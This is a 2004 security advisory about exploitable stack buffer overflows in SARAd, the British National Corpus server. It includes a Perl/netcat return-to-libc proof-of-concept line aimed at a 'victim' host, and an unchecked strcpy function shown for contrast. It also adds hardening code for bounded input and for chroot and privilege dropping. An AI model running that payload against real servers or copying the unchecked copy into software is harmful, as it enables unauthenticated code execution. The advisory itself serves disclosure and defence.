[UNIX] SARAd Buffer Overflow Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 08/25/04

    To: list@securiteam.com
    Date: 25 Aug 2004 16:39:34 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      SARAd Buffer Overflow Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.natcorp.ox.ac.uk/SARA/> SARA is specialized software used
    to serve the British National Corpus (BNC) content. The British National
    Corpus is used by many linguists for research on the English language and
    is licensed commercially by the BNC Consortium. The server software runs on
    various flavors of Unix and is freely available as source.

    There are several buffer overflows present in the SARA server (SARAd), one
    of which is exploitable allowing an attacker to execute arbitrary code on
    the server.

    DETAILS

    Vulnerable Systems:
     * SARA latest version, 16th April 2001

    Successful exploitation of the buffer overflow will result in code
    execution with the privileges of the SARA daemon, which should run in a
    dedicated unprivileged account; however, most installations run it as
    root. No authentication is required by the daemon, and thus an attack is
    easy to carry out.

    The overflows are classic stack-based buffer overflows caused by
    insufficient bounds checking, allowing the attacker to overwrite the
    return address. The following Perl snippet does a return-to-libc on Linux
    2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog():
    perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
     | netcat victim 7000

    The output from this simple operation is:
    Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
    Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string
    SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCK @
    Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority: 80e5540
    Aug 19 20:50:05 drgonzo sarad[6519]:P^F
    Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
    Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal 11
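    The advisory describes the bug class but not SARAd's code, so the
    following is an added illustration written for this page, not code from
    SARAd or from the unofficial patches. It contrasts the unchecked copy of a
    client line into a fixed stack buffer with a bounded read that rejects
    over-long lines instead of truncating them, and strips control bytes
    before the line is logged (the log above shows raw client bytes reaching
    syslog). The buffer size, the sample inputs and all function names are
    assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the fixed stack buffer that receives the client
 * string; the real SARAd buffer sizes are not given in the advisory. */
#define CLIENT_BUF 64

/* Constructed sample inputs (not taken from the advisory). */
const char SAMPLE_SHORT[] = "hello\n";
const char SAMPLE_OVERLONG[] =
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "\n";   /* 70 bytes + newline */

/* The pattern the advisory describes: the client string is copied into a
 * fixed-size stack buffer with no length check, so a line longer than the
 * buffer runs past it into the saved return address. Shown for contrast
 * only; nothing below calls it. */
void handle_client_unchecked(const char *client_str)
{
    char buf[CLIENT_BUF];
    strcpy(buf, client_str);             /* no bounds check: stack overflow */
    printf("Client sent string %s\n", buf);
}

/* Bounded alternative: copy one line from the received bytes into out,
 * storing at most out_len-1 bytes plus the terminator. Returns the number
 * of bytes stored, or -1 if the line does not fit. The line is rejected,
 * not truncated, so an over-long line is never silently accepted as a
 * shorter one. */
int read_client_line(const unsigned char *wire, size_t wire_len,
                     char *out, size_t out_len)
{
    size_t i;
    if (out_len == 0)
        return -1;
    for (i = 0; i < wire_len && wire[i] != '\n'; i++) {
        if (i + 1 >= out_len)            /* no room left for the NUL */
            return -1;
        out[i] = (char)wire[i];
    }
    out[i] = '\0';
    return (int)i;
}

/* Replace control and non-ASCII bytes with '?' before the string reaches
 * syslog. Returns how many bytes were replaced. */
size_t sanitize_for_log(char *s)
{
    size_t replaced = 0;
    for (; *s; s++) {
        if (!isprint((unsigned char)*s)) {
            *s = '?';
            replaced++;
        }
    }
    return replaced;
}

/* Hardened handler: same stack buffer, but the copy is bounded and the
 * logged string is sanitised. Returns the accepted length or -1. */
int handle_client_checked(const char *client_str)
{
    char buf[CLIENT_BUF];
    int n = read_client_line((const unsigned char *)client_str,
                             strlen(client_str), buf, sizeof buf);
    if (n < 0) {
        fprintf(stderr, "client line rejected: longer than %d bytes\n",
                CLIENT_BUF - 1);
        return -1;
    }
    sanitize_for_log(buf);
    printf("Client sent string %s\n", buf);
    return n;
}

int main(void)
{
    handle_client_checked(SAMPLE_SHORT);     /* accepted, length 5 */
    handle_client_checked(SAMPLE_OVERLONG);  /* rejected */
    return 0;
}
```

    Rejecting rather than truncating matters for a logging daemon: a
    truncated line is logged as if the client had sent it, while a rejected
    one produces a distinct, searchable error that a detection rule can key
    on.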

    Patch Availability:
    Although there is no official patch and the program is quite old, there
    are two unofficial patches: one that should be suitable for all systems
    and fixes the above-mentioned bugs, and one that does the same and also
    lets the SARA daemon automatically chroot itself to the corpus directory
    and drop rights to a specified account. The latter will not compile on a
    Windows machine, even though the server itself can be compiled on Windows.

    You can get the patches, including fairly simple installation
    instructions, from
    <http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz>.
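    The second unofficial patch chroots the daemon into the corpus directory
    and drops to a specified account. The advisory does not reproduce that
    patch, so the following is an added example written for this page (not
    the patch's own code) of how such confinement is done correctly on a
    Unix system: chdir before chroot, clear supplementary groups and set the
    gid before the uid, and verify afterwards that root cannot be regained.
    The directory, the account name and the function names are assumptions;
    the real values would come from the daemon's configuration.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <sys/types.h>
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical defaults; placeholders, not values from the advisory or the
 * unofficial patch. */
#define DEFAULT_CORPUS_DIR "/srv/bnc-corpus"
#define DEFAULT_ACCOUNT    "sara"

/* Look up an account by name: returns 1 if it exists and is not uid 0,
 * 0 if it is root, -1 if unknown. uid/gid are filled when non-NULL. */
int lookup_unprivileged_account(const char *name, uid_t *uid, gid_t *gid)
{
    struct passwd *pw = getpwnam(name);
    if (pw == NULL)
        return -1;
    if (uid) *uid = pw->pw_uid;
    if (gid) *gid = pw->pw_gid;
    return pw->pw_uid == 0 ? 0 : 1;
}

/* Confine the daemon: chroot into corpus_dir and drop to uid/gid.
 * Order matters: chdir before chroot (so the cwd is inside the new root),
 * supplementary groups and gid before uid (once the uid is dropped, setgid
 * would fail), then a check that root cannot be regained. Returns 0 on
 * success, -1 with errno set on failure; the caller must exit on failure
 * rather than continue with whatever privileges it still holds. */
int confine_daemon(const char *corpus_dir, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) {          /* refuse a "drop" that stays root */
        errno = EINVAL;
        return -1;
    }
    if (chdir(corpus_dir) != 0)
        return -1;
    if (chroot(corpus_dir) != 0)
        return -1;
    if (chdir("/") != 0)                 /* cwd must be inside the new root */
        return -1;
    if (setgroups(0, NULL) != 0)         /* clear inherited supplementary groups */
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    if (setuid(0) == 0 || setgid(0) == 0) { /* the drop must be irreversible */
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    const char *dir  = argc > 1 ? argv[1] : DEFAULT_CORPUS_DIR;
    const char *acct = argc > 2 ? argv[2] : DEFAULT_ACCOUNT;
    uid_t uid;
    gid_t gid;

    if (lookup_unprivileged_account(acct, &uid, &gid) != 1) {
        fprintf(stderr, "account %s is unknown or is root; refusing to start\n",
                acct);
        return EXIT_FAILURE;
    }
    if (confine_daemon(dir, uid, gid) != 0) {
        perror("confine_daemon");
        return EXIT_FAILURE;
    }
    printf("confined to %s as uid %lu gid %lu\n", dir,
           (unsigned long)uid, (unsigned long)gid);
    /* ... accept client connections here ... */
    return EXIT_SUCCESS;
}
```

    Run as root with a real corpus directory and an existing unprivileged
    account; the confinement calls fail with EPERM when the process is not
    root, which is the correct outcome, since a daemon that cannot drop
    privileges should not start rather than run with what it has. With this
    in place, the overflow described above would yield a process confined to
    the corpus directory under an unprivileged uid instead of root.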

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:Matthias.Bethke@gmx.net>
    Matthias Bethke.
